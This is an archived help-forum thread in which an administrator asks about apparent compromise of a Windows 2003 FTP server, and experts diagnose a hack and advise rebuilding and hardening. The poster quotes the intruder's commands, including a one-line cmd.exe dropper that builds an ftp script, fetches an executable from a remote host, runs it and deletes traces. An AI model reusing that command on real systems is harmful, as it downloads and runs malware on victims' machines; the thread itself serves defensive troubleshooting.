Solved

FTP server - possible virus/backdoor/trojan?

Posted on 2006-11-30
8
847 Views
Last Modified: 2013-12-04
I have a standard fully patched Windwos 2003 Server running as an FTP server, I have done a full virus and spywear scan but everyso often I log in va VNC and there will be a command prompt open with the following text:


Could Not Find C:\Documents and Settings\Administrator\i
ftp> open xx.xx.xxx.xxx 4235
Connected to xx.xx.xxx.xxx.
220 Reptile welcomes you..
ftp> user 1 1
331 Password required
230 User logged in.
ftp> get 532.exe
200 PORT command successful.
150 Opening BINARY mode data connection


This is VERY worrying - and I cant find a lot of info about it - I admit my IIS installation may not be very secure - can someone advise me on this issue?
0
Comment
Question by:STEVEO5
8 Comments
 
LVL 11

Expert Comment

by:Kruno Džoić
ID: 18053290
services.msc, and check for services with letters ftp or strange services ( use google to indentify services )
0
 

Author Comment

by:STEVEO5
ID: 18053506
Had a look - couldnt find anythign strange - although i noticed this command in the Start, run dialogue and I didnt type it - any ideas?


cmd.exe /c del i&echo open xx.xx.xxx.xxx 6745 > i&echo user 1 1 >> i &echo get 870.exe >> i &echo quit >> i &ftp -n -s:i &870.exe&del i&exit
0
 
LVL 12

Expert Comment

by:Phil_Agcaoili
ID: 18060208
Do you have a firewall in front of this server?
If not, you NEED a fw.
If so, what do the logs say that is going on to/from this FTP server?

I bet someone has compromised your system and is uploading/downloading to/from it based on what you see.

I would:
- Remove this server from the network
- Rebuild this FTP server, patch it and follow an Internet server hardening guide
- Install a network fw in front of it and limit access to the rebuilt  FTP server
- Monitor network activity just in case other systems have been compromised

0
Ransomware: The New Cyber Threat & How to Stop It

This infographic explains ransomware, type of malware that blocks access to your files or your systems and holds them hostage until a ransom is paid. It also examines the different types of ransomware and explains what you can do to thwart this sinister online threat.  

 
LVL 9

Expert Comment

by:maninblac1
ID: 18062963
Well, it's difficult for me to tell you exactly what's going on, it sure looks like a hack.

But the thing i can tell you is it's likely the hacker is coming from a computer that is running UNIX

UNIX (and maybe linux as well i'm not 100% sure) ftp requires the connection to enter "BINARY mode" to transfer data, that was a big tip off to me, is that your server is 2003 and yet it is in binary mode something odd for a windows box to my knowledge

Is this a FTP server with logon requied?  If so doesn't windows transmit FTP user/passwords in plain text so a packet sniffer could have sniffed out a login and is now accessing your FTP.

Check your logs for connections and the users who connected you may find your answers there.

In fact either this is a script, or it's definately a hack, the command flags indicate suspicious behavour, running the command then closing the prompt "cmd.exe /c" then he get's a file 870.exe off of a remote sever.  Then he does "ftp -n -s" supresses the login and runs the executable with the -s command, then exits the command.

I'd say look for the file 870.exe but it appears that he deletes it before he leaves.  I'd beef up security definately.
0
 

Author Comment

by:STEVEO5
ID: 18066971
Server is behind a router/firewall.

Can you advise on a server hardening guide?

My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet
0
 
LVL 12

Accepted Solution

by:
Phil_Agcaoili earned 500 total points
ID: 18074621
Follow the 2003 server hardening guides here: http://support.microsoft.com/default.aspx/kb/885409

Ok, did you verify that the firewall is only allowing access to the FTP service on this server?
If not, you need to scan your server from the Net and verify that you're only serving FTP.

This was troubling and also part of why you were just hacked:
"My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet"

Anything on a network and especially something connected to the Internet requires authentication.

Anonymous access access to FTP is somewhat fine these days, but access to virtual directories should always be authenticated.
0
 
LVL 1

Expert Comment

by:Computer101
ID: 21101050
Forced accept.

Computer101
EE Admin
0

Featured Post

Complete VMware vSphere® ESX(i) & Hyper-V Backup

Capture your entire system, including the host, with patented disk imaging integrated with VMware VADP / Microsoft VSS and RCT. RTOs is as low as 15 seconds with Acronis Active Restore™. You can enjoy unlimited P2V/V2V migrations from any source (even from a different hypervisor)

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

As I write this article, I am finishing cleanup from the Qakbot virus variant found in the wild on April 18, 2011.  It was a messy beast that had varying levels of infection, speculated as being dependent on how long it resided on the infected syste…
In today's information driven age, entrepreneurs have so many great tools and options at their disposal to help turn good ideas into a thriving business. With cloud-based online services, such as Amazon's Web Services (AWS) or Microsoft's Azure, bus…
Two types of users will appreciate AOMEI Backupper Pro: 1 - Those with PCIe drives (and haven't found cloning software that works on them). 2 - Those who want a fast clone of their boot drive (no re-boots needed) and it can clone your drive wh…
Email security requires an ever evolving service that stays up to date with counter-evolving threats. The Email Laundry perform Research and Development to ensure their email security service evolves faster than cyber criminals. We apply our Threat…

860 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question